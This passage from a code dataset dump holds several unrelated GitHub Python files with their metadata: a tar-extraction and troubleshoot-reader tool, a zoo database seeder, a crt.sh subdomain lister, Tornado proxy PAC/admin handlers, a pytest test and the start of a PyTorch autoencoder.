'.join(\r\n str(key) for key, value in commands_dict.items()) + CEND)\r\n # After listing all commands, ask the user to provide a desired command\r\n command = input(\"Enter a \" + LIGHT_CYAN + \"[specific command]\" + CEND + \": \")\r\n try:\r\n # Now try to find the mentioned command position to understand what are the important lines to print the output of the command\r\n current_line = commands_dict[command]\r\n\r\n # Next we will identify the line position of the next command\r\n next_key = None\r\n dict_iter = iter(commands_dict)\r\n for key in dict_iter:\r\n if key == command:\r\n next_key = next(dict_iter, None)\r\n \r\n # After finding the line position, we'll subtract one line, this line is exactly the next command line and we just want the output\r\n try:\r\n next_line = (commands_dict[next_key] - 1)\r\n # If the user is searching for the last command, we cannot expect to identify the important lines by finding the next command line\r\n except:\r\n next_line = last_line\r\n\r\n # Now that we have the important lines, we'll determine the range and 
print the output of the selected command\r\n output_interval = range(current_line, next_line)\r\n lines_to_read = list(output_interval)\r\n print(\"------------------------------------------------------------------------\")\r\n print(f\"Output for: {command}\")\r\n for position, line in enumerate(read_text):\r\n if position in lines_to_read:\r\n print(line.strip())\r\n print(\"------------------------------------------------------------------------\")\r\n except:\r\n # If the user provided an invalid command, inform it was not found and print similar commands by using a regex search\r\n print(LIGHT_RED + \"Command not found!\" + CEND)\r\n\r\n print('Similar commands: ' + LIGHT_CYAN + ', '.join(\r\n str(key) for key, value in commands_dict.items() if re.match(r\"\" + re.escape(command) + \".*\", key)) + CEND)\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n print(\"------------------------------------------------------------------------\")\r\n print(LIGHT_CYAN + '88888888888 d88888888888b. .d8888b. 888 888 .d88888b. .d88888b.8888888888888888888888888888b. ')\r\n print(' 888 d88888888 Y88b d88P Y88b888 888d88P\" \"Y88bd88P\" \"Y88b 888 888 888 Y88b ')\r\n print(CYAN + ' 888 d88P888888 888 Y88b. 888 888888 888888 888 888 888 888 888 ')\r\n print(' 888 d88P 888888 d88P \"Y888b. 8888888888888 888888 888 888 8888888 888 d88P ')\r\n print(LIGHT_BLUE + ' 888 d88P 8888888888P\" \"Y88b.888 888888 888888 888 888 888 8888888P\" ')\r\n print(BLUE + ' 888 d88P 888888 T88b \"888888 888888 888888 888 888 888 888 T88b ')\r\n print(' 888 d8888888888888 T88b Y88b d88P888 888Y88b. .d88PY88b. .d88P 888 888 888 T88b ')\r\n print(' 888 d88P 888888 T88b \"Y8888P\" 888 888 \"Y88888P\" \"Y88888P\" 888 8888888888888 T88b ' + CEND)\r\n print(\"------------------------------------------------------------------------\")\r\n while True:\r\n print(LIGHT_CYAN + \"TarShooter\" + CEND + \" can be run in two different modes: \" + LIGHT_CYAN + \"extract [1]\" + CEND + \" or \" + LIGHT_CYAN + \"read [2]\" + CEND + \".\")\r\n print(\"Select \" + LIGHT_CYAN + \"[1]\" + CEND + \" extract mode to extract a .gz file.\")\r\n print(\"Select \" + LIGHT_CYAN + \"[2]\" + CEND + \" to read the troubleshoot file.\")\r\n print(\"Select \" + LIGHT_CYAN + \"[3]\" + CEND + \" or press \" + LIGHT_CYAN + \"CTRL + C\" + CEND + \" at any time to exit.\")\r\n print(\"------------------------------------------------------------------------\")\r\n\r\n menu_option = input(\"Choose an option \" + LIGHT_CYAN + \"[1-3]\" + CEND + \": \")\r\n\r\n if menu_option == \"1\":\r\n print(\"You have selected\" + LIGHT_CYAN + \" [1] extract mode\" + CEND + \".\")\r\n print(\"------------------------------------------------------------------------\")\r\n file_path = input(\"File path: \")\r\n dest_dir = input(\"Destination directory: \")\r\n makedir(dest_dir)\r\n untar(file_path, dest_dir)\r\n\r\n if menu_option == \"2\":\r\n print(\"You have selected\" + LIGHT_CYAN + \" [2] read mode\" + CEND + \".\")\r\n print(\"------------------------------------------------------------------------\")\r\n work_dir = input(\"Please provide a path to the troubleshooting file: \")\r\n if os.path.isfile(work_dir):\r\n print(\"File \" + LIGHT_CYAN + work_dir + CEND + \" found!\")\r\n tshoot(work_dir)\r\n else:\r\n print(\"Could not locate the informed file. Please check the syntax.\")\r\n\r\n if menu_option == \"3\":\r\n os._exit(1)\r\n\r\n except KeyboardInterrupt:\r\n print(LIGHT_RED + \"\\nBreak sequence CTRL + C detected. 
Script will exit.\" + CEND)\r\n try:\r\n sys.exit(0)\r\n except SystemExit:\r\n os._exit(0)\r\n", "repo_name": "RenanHingel/tarshooter", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.exists", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 30, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 36, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 58, "usage_type": "call"}, {"api_name": "cchardet.detect", "line_number": 60, "usage_type": "call"}, {"api_name": "re.match", "line_number": 122, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "os._exit", "line_number": 165, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 170, "usage_type": "call"}, {"api_name": "os._exit", "line_number": 172, "usage_type": "call"}]} +{"seq_id": "29465212490", "text": "\nimport pandas as pd\nimport datetime as dt\nimport uuid\nimport random\nimport math\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.exc import OperationalError\n\nfrom .logger import get_logger\nfrom . helpers import generate_habitat_composite\n\nfrom config import Config\n\n\nmodule_logger = get_logger(__name__)\n\nengine = create_engine(\n Config.SQLALCHEMY_DATABASE_URI, \n convert_unicode=True,\n connect_args={\"check_same_thread\": False}\n )\n\ndb_session = scoped_session(sessionmaker(autocommit=False,\n autoflush=False,\n bind=engine))\nBase = declarative_base()\nBase.query = db_session.query_property()\n\n\ndef init_db(need_reset = False):\n if need_reset:\n drop_db()\n try: \n sql = f\"SELECT * FROM association_table_breed_food WHERE 1\"\n query = engine.execute(sql) \n _ = query.first()[0]\n except (OperationalError, TypeError) as ex: \n drop_db()\n Base.metadata.create_all(bind=engine) \n seed_db()\n\n\ndef seed_db():\n from .models import Food, Movement, Breed, Habitat, Cage, CageMeal, InitialDate\n module_logger.info('Seeding DB')\n\n f_m_dict = {\n 'food':['meat', 'milk', 'fish', 'insect', 'grass', 'vegetable', 'fruit', 'grain', 'plant', 'mixed', 'granulated'],\n 'movement':['fly', 'swim', 'walk', 'crawl','jump']\n }\n \n food_types_dic = {\n 'meat':'chicken', 'milk':'condesed milk', 'fish':'salmon', 'insect':'fly', 'grass':'cynodon dactylon', \n 'vegetable':'paprika', 'fruit':'apple', 'grain':'soy', 'plant':'algae', 'mixed':'mixed', 'granulated':'granulated'\n }\n for key in f_m_dict.keys():\n \n if key == 'food':\n df = pd.DataFrame({'food_type':f_m_dict[key]}) \n df['food_name'] = df['food_type'].apply(lambda x: food_types_dic[x]) \n df['energy'] = df['food_name'].apply(lambda x: random.randint(1,5000)) \n else:\n df = pd.DataFrame({'movement_name':f_m_dict[key]})\n\n df.to_sql(\n key,\n con=engine,\n if_exists='append',\n chunksize=1000,\n index=False\n )\n\n breed_seed_df = pd.read_csv('breeds.csv')\n for _, row in breed_seed_df.iterrows():\n db_habitats_composites = [x[0] for x in db_session.query(Habitat.composite_id).all()]\n habitat_tokens = row.habitat.split(';')\n 
curr_notes = habitat_tokens[9] \n curr_composite = generate_habitat_composite(habitat_tokens[:-1]) \n if curr_composite in db_habitats_composites:\n curr_breed_habitat = Habitat.query.filter(Habitat.composite_id == curr_composite).first()\n else:\n curr_breed_habitat = Habitat(\n min_air_volume = habitat_tokens[0],\n min_water_volume = habitat_tokens[1],\n min_surface_area = habitat_tokens[2],\n min_temperature = habitat_tokens[3], \n max_temperature = habitat_tokens[4], \n min_humidity = habitat_tokens[5],\n max_humidity = habitat_tokens[6],\n min_uv_index = habitat_tokens[7],\n max_uv_index = habitat_tokens[8],\n composite_id = curr_composite,\n habitat_notes = curr_notes,\n )\n curr_breed_habitat.save() \n random_animals_count_per_cage = random.randrange(1,40)\n cage_habitat = Habitat(\n min_air_volume = float(curr_breed_habitat.min_air_volume) * random_animals_count_per_cage,\n min_water_volume = float(curr_breed_habitat.min_water_volume) * random_animals_count_per_cage,\n min_surface_area = float(curr_breed_habitat.min_surface_area) * random_animals_count_per_cage,\n min_temperature = curr_breed_habitat.min_temperature,\n max_temperature = curr_breed_habitat.max_temperature,\n min_humidity = curr_breed_habitat.min_humidity,\n max_humidity = curr_breed_habitat.max_humidity,\n min_uv_index = curr_breed_habitat.min_uv_index,\n max_uv_index = curr_breed_habitat.max_uv_index,\n composite_id = '0',\n habitat_notes = curr_notes,\n )\n cage_composite = generate_habitat_composite(\n [\n cage_habitat.min_air_volume,\n cage_habitat.min_water_volume,\n cage_habitat.min_surface_area,\n cage_habitat.min_temperature,\n cage_habitat.max_temperature,\n cage_habitat.min_humidity,\n cage_habitat.max_humidity,\n cage_habitat.min_uv_index,\n cage_habitat.max_uv_index, \n ]\n )\n db_cage_habitat = Habitat.query.filter(Habitat.composite_id == cage_composite).first()\n if db_cage_habitat:\n cage_habitat = db_cage_habitat\n else:\n cage_habitat.save()\n length = random.randrange(30,50) \n height = random.randrange(2,7) \n width = math.ceil(cage_habitat.min_surface_area / length)\n cage = Cage(\n habitat_id = cage_habitat.id,\n inventory_id = uuid.uuid4().hex,\n cage_name = None,\n curr_temperature = random.randrange(int(curr_breed_habitat.min_temperature), int(curr_breed_habitat.max_temperature)), \n width = width,\n length = length,\n height = height,\n cage_notes = None\n )\n cage.save()\n\n curr_breed = Breed(\n breed_name = str(row['name']).lower(),\n species = str(row.species).lower(),\n min_weight = row.min_weight,\n min_body_temp = row.min_body_temp,\n max_body_temp = row.max_body_temp,\n min_food_energy_intake = row.min_food_energy_intake,\n max_food_energy_intake = row.max_food_energy_intake,\n is_cold_blooded = row.is_cold_blooded,\n is_predator = row.is_predator,\n breed_notes = None \n ) \n\n for food_type in row.food.split(';'):\n db_food = Food.query.filter(Food.food_type == str(food_type).lower()).first()\n curr_breed.breed_foods.append(db_food)\n cage_meal = CageMeal(\n cage_id = cage.id,\n food_id = db_food.id,\n cage_meal_qty = random.randint(1,100)\n )\n cage_meal.save()\n\n\n for movement in row.movement.split(';'):\n db_movement = Movement.query.filter(Movement.movement_name == str(movement).lower()).first()\n curr_breed.movements.append(db_movement)\n \n curr_breed_habitat.breeds.append(curr_breed) \n curr_breed.save() \n\n\n animal_seed_df = pd.read_csv('animals.csv')\n animal_seed_df['id'] = animal_seed_df.index + 1\n animal_seed_df['personal_id'] = [uuid.uuid4().hex for _ in 
range(len(animal_seed_df))] \n animal_seed_df['inserted_at'] = dt.datetime.utcnow()\n animal_seed_df['updated_at'] = dt.datetime.utcnow()\n animal_seed_df.to_sql(\n 'animal',\n con=engine,\n if_exists='append',\n chunksize=1000,\n index=False\n )\n InitialDate(initial_date = dt.datetime.utcnow()).save()\n\n \n \n\ndef drop_db():\n module_logger.info('Dropping DB')\n Base.metadata.drop_all(bind=engine)\n\n", "repo_name": "morskibg/zoo", "sub_path": "app/database.py", "file_name": "database.py", "file_ext": "py", "file_size_in_byte": 7547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logger.get_logger", "line_number": 18, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 20, "usage_type": "call"}, {"api_name": "config.Config.SQLALCHEMY_DATABASE_URI", "line_number": 21, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.scoped_session", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.declarative.declarative_base", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 40, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 62, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 64, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 66, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 76, "usage_type": "call"}, {"api_name": "models.Habitat.composite_id", "line_number": 78, "usage_type": "attribute"}, {"api_name": "models.Habitat", "line_number": 78, "usage_type": "name"}, {"api_name": "helpers.generate_habitat_composite", "line_number": 81, "usage_type": "call"}, {"api_name": "models.Habitat.query.filter", "line_number": 83, "usage_type": "call"}, {"api_name": "models.Habitat.query", "line_number": 83, "usage_type": "attribute"}, {"api_name": "models.Habitat", "line_number": 83, "usage_type": "name"}, {"api_name": "models.Habitat.composite_id", "line_number": 83, "usage_type": "attribute"}, {"api_name": "models.Habitat", "line_number": 85, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 99, "usage_type": "call"}, {"api_name": "models.Habitat", "line_number": 100, "usage_type": "call"}, {"api_name": "helpers.generate_habitat_composite", "line_number": 113, "usage_type": "call"}, {"api_name": "models.Habitat.query.filter", "line_number": 126, "usage_type": "call"}, {"api_name": "models.Habitat.query", "line_number": 126, "usage_type": "attribute"}, {"api_name": "models.Habitat", "line_number": 126, "usage_type": "name"}, {"api_name": "models.Habitat.composite_id", "line_number": 126, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 131, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 132, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 133, "usage_type": "call"}, {"api_name": "models.Cage", "line_number": 134, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 136, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 138, "usage_type": "call"}, {"api_name": "models.Breed", "line_number": 146, "usage_type": "call"}, {"api_name": "models.Food.query.filter", "line_number": 160, "usage_type": "call"}, {"api_name": "models.Food.query", "line_number": 160, 
"usage_type": "attribute"}, {"api_name": "models.Food", "line_number": 160, "usage_type": "name"}, {"api_name": "models.Food.food_type", "line_number": 160, "usage_type": "attribute"}, {"api_name": "models.CageMeal", "line_number": 162, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 165, "usage_type": "call"}, {"api_name": "models.Movement.query.filter", "line_number": 171, "usage_type": "call"}, {"api_name": "models.Movement.query", "line_number": 171, "usage_type": "attribute"}, {"api_name": "models.Movement", "line_number": 171, "usage_type": "name"}, {"api_name": "models.Movement.movement_name", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 178, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 180, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 181, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 181, "usage_type": "attribute"}, {"api_name": "datetime.datetime.utcnow", "line_number": 182, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 182, "usage_type": "attribute"}, {"api_name": "models.InitialDate", "line_number": 190, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 190, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 190, "usage_type": "attribute"}]} +{"seq_id": "2595308143", "text": "# -*- coding: utf-8 -*-\n# @Author : 90sec.com\n# @Tools : Pycharm\nprint(\"\"\"\n+++++++++++++++++++++++++++++++++++++++++++\n______ _ _ _____ _____ _ +\n| ___(_) | | / ___/ ___| | +\n| |_ _ _ __ __| | \\ `--.\\ `--.| | +\n| _| | | '_ \\ / _` | `--. \\`--. | | +\n| | | | | | | (_| | /\\__/ /\\__/ | |____ +\n\\_| |_|_| |_|\\__,_| \\____/\\____/\\_____/ +\n +\n+++++++++++++++++++++++++++++++++++++++++++ \n\"\"\")\n\nimport requests\nimport re\nimport sys\nimport os\n\nTIME_OUT = 60\ndef get_SSL(domain):\n domains = []\n url = 'https://crt.sh/?q=%25.{}'.format(domain)\n response = requests.get(url,timeout = TIME_OUT)\n ssl = re.findall(\"(.*?).{}\".format(domain),response.text)\n for i in ssl:\n i += '.' 
+ domain\n domains.append(i)\r\n fileurl = open('url.txt','w')\r\n for i in domains:\r\n fileurl.write(i)\r\n fileurl.write('\\n')\r\n fileurl.close()\r\n file = os.path.exists('url.txt')\r\n filesize = os.path.getsize('url.txt')\r\n if file and (filesize > 0):\r\n print(\"Ok!\")\r\n else:\r\n print(\"Failed!\")\r\nif __name__ == '__main__':\r\n result = sys.argv[1]\r\n get_SSL(result)", "repo_name": "theblackjoker/diytools", "sub_path": "findssl/run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 1234, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "37313319704", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nCreated on 2015-01-11\n\n@author: dxw\n'''\nfrom gittornado import BaseHandler\nimport tornado\nimport DDDProxyConfig\nfrom DDDProxy import domainConfig\nfrom DDDProxy.hostParser import parserUrlAddrPort, getDomainName\nimport json\nimport httplib\n\nclass DDDProxyBaseHandler(BaseHandler):\n\t\n\tdef getRequestHost(self):\n\t\taddrPort = parserUrlAddrPort(self.request.protocol + \"://\" + self.request.host);\n\t\treturn addrPort[0]\n\tdef get_template_path(self):\n\t\treturn \"./template/\";\n\nclass pacHandler(DDDProxyBaseHandler):\n\t@tornado.web.asynchronous\n\tdef get(self):\n\t\tself.set_header(\"Content-Type\", \"application/javascript\")\n\t\tself.render(\"pac.js\", proxy_ddr=\"%s:%d\" % (self.getRequestHost(), DDDProxyConfig.localServerProxyListenPort),\n\t\t\t\tdomainList=domainConfig.config.getDomainOpenedList())\n\nclass helpHandler(DDDProxyBaseHandler):\n\t@tornado.web.asynchronous\n\tdef get(self):\n\t\tpacAddrOrigin = \"%s://%s/pac\"%(self.request.protocol,self.request.host)\n\t\tself.render(\"fq_temp.html\", info=\"\", pacAddr=pacAddrOrigin,pacAddrOrigin=pacAddrOrigin)\nclass adminHandler(DDDProxyBaseHandler):\n\t@tornado.web.asynchronous\n\tdef get(self):\n\t\topt = self.get_argument('opt',\"\").encode('utf8')\n\t\tif opt == \"\":\n\t\t\tself.render(\"admin_temp.html\")\n\t\telse:\n\t\t\tif opt == \"puturl\":\n\t\t\t\taddr,port = parserUrlAddrPort(self.get_argument(\"url\").encode('utf8'))\n\t\t\t\tif addr:\n\t\t\t\t\tdomain = getDomainName(addr)\n\t\t\t\t\tif domainConfig.config.addDomain(domain):\n\t\t\t\t\t\tdomainConfig.config.save()\n\t\t\t\tself.redirect(\"/admin\", False)\n\t\t\telse:\n\t\t\t\tdomain = self.get_argument(\"domain\",default=\"\").encode('utf8')\n\t\t\t\tok = False\n\t\t\t\tif opt == \"delete\":\n\t\t\t\t\tok = domainConfig.config.removeDomain(domain)\n\t\t\t\telif opt == \"close\":\n\t\t\t\t\tok = domainConfig.config.closeDomain(domain)\n\t\t\t\telif opt == \"open\":\n\t\t\t\t\tok = domainConfig.config.openDomain(domain)\n\t\t\t\tif ok:\n\t\t\t\t\tdomainConfig.config.save()\n\t\t\t\tself.redirect(\"/admin\", False)\n\t\n\t@tornado.web.asynchronous\n\tdef post(self):\n\t\tpostJson = json.loads(self.request.body)\n\t\tdata = None\n\t\topt = postJson[\"opt\"]\n\t\tif opt==\"domainList\":\n\t\t\tdata=domainConfig.config.getDomainListWithAnalysis()\n\t\telif opt == 
\"analysisDataList\":\n\t\t\tdata=domainConfig.analysis.getAnalysisData(postJson[\"domain\"],postJson[\"startTime\"])\n\t\telif opt == \"domainDataList\":\n\t\t\tdata = domainConfig.analysis.getTodayDomainAnalysis()\n\t\tself.set_header(\"Content-Type\", \"application/json\")\n\t\tself.write(json.dumps(data))\n\t\tself.finish()\n", "repo_name": "chintj/DDDProxy", "sub_path": "DDDProxy/webHandler.py", "file_name": "webHandler.py", "file_ext": "py", "file_size_in_byte": 2447, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "61", "api": [{"api_name": "gittornado.BaseHandler", "line_number": 16, "usage_type": "name"}, {"api_name": "DDDProxy.hostParser.parserUrlAddrPort", "line_number": 19, "usage_type": "call"}, {"api_name": "DDDProxyConfig.localServerProxyListenPort", "line_number": 28, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig.config.getDomainOpenedList", "line_number": 29, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 29, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 29, "usage_type": "name"}, {"api_name": "tornado.web", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 32, "usage_type": "attribute"}, {"api_name": "DDDProxy.hostParser.parserUrlAddrPort", "line_number": 44, "usage_type": "call"}, {"api_name": "DDDProxy.hostParser.getDomainName", "line_number": 46, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config.addDomain", "line_number": 47, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 47, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 47, "usage_type": "name"}, {"api_name": "DDDProxy.domainConfig.config.save", "line_number": 48, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 48, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 48, "usage_type": "name"}, {"api_name": "DDDProxy.domainConfig.config.removeDomain", "line_number": 54, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 54, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 54, "usage_type": "name"}, {"api_name": "DDDProxy.domainConfig.config.closeDomain", "line_number": 56, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 56, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 56, "usage_type": "name"}, {"api_name": "DDDProxy.domainConfig.config.openDomain", "line_number": 58, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 58, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 58, "usage_type": "name"}, {"api_name": "DDDProxy.domainConfig.config.save", "line_number": 60, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 60, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 60, "usage_type": "name"}, {"api_name": "tornado.web", "line_number": 37, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 65, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config.getDomainListWithAnalysis", "line_number": 69, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.config", "line_number": 69, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 69, "usage_type": "name"}, {"api_name": 
"DDDProxy.domainConfig.analysis.getAnalysisData", "line_number": 71, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.analysis", "line_number": 71, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 71, "usage_type": "name"}, {"api_name": "DDDProxy.domainConfig.analysis.getTodayDomainAnalysis", "line_number": 73, "usage_type": "call"}, {"api_name": "DDDProxy.domainConfig.analysis", "line_number": 73, "usage_type": "attribute"}, {"api_name": "DDDProxy.domainConfig", "line_number": 73, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 75, "usage_type": "call"}, {"api_name": "tornado.web", "line_number": 63, "usage_type": "attribute"}]} +{"seq_id": "24115523408", "text": "import pytest\nfrom src.funciones.unirCancionYLugar import unirCancionYlugar\n\n\n@pytest.mark.unirCancionYLugar\ndef test_unirCancionYLugar():\n \n playlistRandom = {2: 'California Uber Alles', 1: \"Elvis' Flaming Star\", 3: 'King Kunta', 4: 'Against the moon', 5: 'Headless'}\n\n lugarCancion = {'California Uber Alles': '.\\\\libreria\\\\California_Uber_Alles.mp3', \"Elvis' Flaming Star\": \".\\\\libreria\\\\Elvis' Flaming Star.flac\", 'King Kunta': '.\\\\libreria\\\\King_Kunta.mp3', 'Against the moon': '.\\\\libreria\\\\against the moon.mp3', 'Headless': '.\\\\libreria\\\\Headless.mp3'}\n\n\n assert (unirCancionYlugar(playlistRandom, lugarCancion)) == {2: {'California Uber Alles': '.\\\\libreria\\\\California_Uber_Alles.mp3'}, 1: {\"Elvis' Flaming Star\": \".\\\\libreria\\\\Elvis' Flaming Star.flac\"}, 3: {'King Kunta': '.\\\\libreria\\\\King_Kunta.mp3'}, 4: {'Against the moon': '.\\\\libreria\\\\against the moon.mp3'}, 5: {'Headless': '.\\\\libreria\\\\Headless.mp3'}}\n\n", "repo_name": "ClearCB/proyect-vlc-shuffle", "sub_path": "test/test_unirCancionYLugar.py", "file_name": "test_unirCancionYLugar.py", "file_ext": "py", "file_size_in_byte": 937, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "src.funciones.unirCancionYLugar.unirCancionYlugar", "line_number": 13, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 5, "usage_type": "attribute"}]} +{"seq_id": "26629153621", "text": "from abc import abstractmethod\nfrom dataclasses import dataclass\nfrom typing import Generic, List, Tuple, Type\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom mohou.model.common import LossDict, ModelBase, ModelConfigBase\nfrom mohou.types import ImageBase, ImageT\n\n\n@dataclass\nclass AutoEncoderConfig(ModelConfigBase):\n image_type: Type[ImageBase]\n n_bottleneck: int = 16\n n_pixel: int = 112\n\n def __post_init__(self):\n # validation\n assert self.n_pixel in [28, 112, 224]\n\n\nclass Reshape(nn.Module):\n def __init__(self, *args):\n super(Reshape, self).__init__()\n self.shape = args\n\n def forward(self, x):\n return x.view(self.shape)\n\n\ndef create_encoder_decoder_layers(\n n_channel: int, n_pixel: int, n_bottleneck: int\n) -> Tuple[List[nn.Module], List[nn.Module]]:\n assert n_pixel in [28, 112, 224]\n\n if n_pixel == 224:\n encoder_layers = [\n nn.Conv2d(n_channel, 8, 3, padding=1, stride=(2, 2)), # 112x112\n nn.ReLU(inplace=True),\n nn.Conv2d(8, 16, 3, padding=1, stride=(2, 2)), # 56x56\n nn.ReLU(inplace=True),\n nn.Conv2d(16, 32, 3, padding=1, stride=(2, 2)), # 28x28\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, 3, padding=1, stride=(2, 2)), # 14x14\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 128, 3, padding=1, stride=(2, 2)), # 7x7\n nn.ReLU(inplace=True),\n 
nn.Conv2d(128, 256, 3, padding=1, stride=(2, 2)), # 4x4\n nn.ReLU(inplace=True),\n nn.Flatten(),\n nn.Linear(256 * 16, 512),\n nn.ReLU(inplace=True),\n nn.Linear(512, n_bottleneck),\n nn.ReLU(inplace=True),\n ]\n decoder_layers = [\n nn.Linear(n_bottleneck, 512),\n nn.ReLU(inplace=True),\n nn.Linear(512, 256 * 16),\n nn.ReLU(inplace=True),\n Reshape(-1, 256, 4, 4),\n nn.ConvTranspose2d(256, 128, 3, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(128, 64, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(16, 8, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(8, n_channel, 4, stride=2, padding=1),\n nn.Sigmoid(),\n ]\n elif n_pixel == 112:\n encoder_layers = [\n nn.Conv2d(n_channel, 8, 3, padding=1, stride=(2, 2)), # 56x56\n nn.ReLU(inplace=True),\n nn.Conv2d(8, 16, 3, padding=1, stride=(2, 2)), # 28x28\n nn.ReLU(inplace=True),\n nn.Conv2d(16, 32, 3, padding=1, stride=(2, 2)), # 14x14\n nn.ReLU(inplace=True),\n nn.Conv2d(32, 64, 3, padding=1, stride=(2, 2)), # 7x7\n nn.ReLU(inplace=True),\n nn.Conv2d(64, 128, 3, padding=1, stride=(2, 2)), # 4x4\n nn.ReLU(inplace=True),\n nn.Flatten(),\n nn.Linear(128 * 16, 512),\n nn.ReLU(inplace=True),\n nn.Linear(512, n_bottleneck),\n nn.ReLU(inplace=True),\n ]\n decoder_layers = [\n nn.Linear(n_bottleneck, 512),\n nn.ReLU(inplace=True),\n nn.Linear(512, 128 * 16),\n nn.ReLU(inplace=True),\n Reshape(-1, 128, 4, 4),\n nn.ConvTranspose2d(128, 64, 3, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(64, 32, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(32, 16, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(16, 8, 4, stride=2, padding=1),\n nn.ReLU(inplace=True),\n nn.ConvTranspose2d(8, n_channel, 4, stride=2, padding=1),\n nn.Sigmoid(),\n ]\n else:\n encoder_layers = [\n nn.Conv2d(n_channel, 8, 3, padding=1, 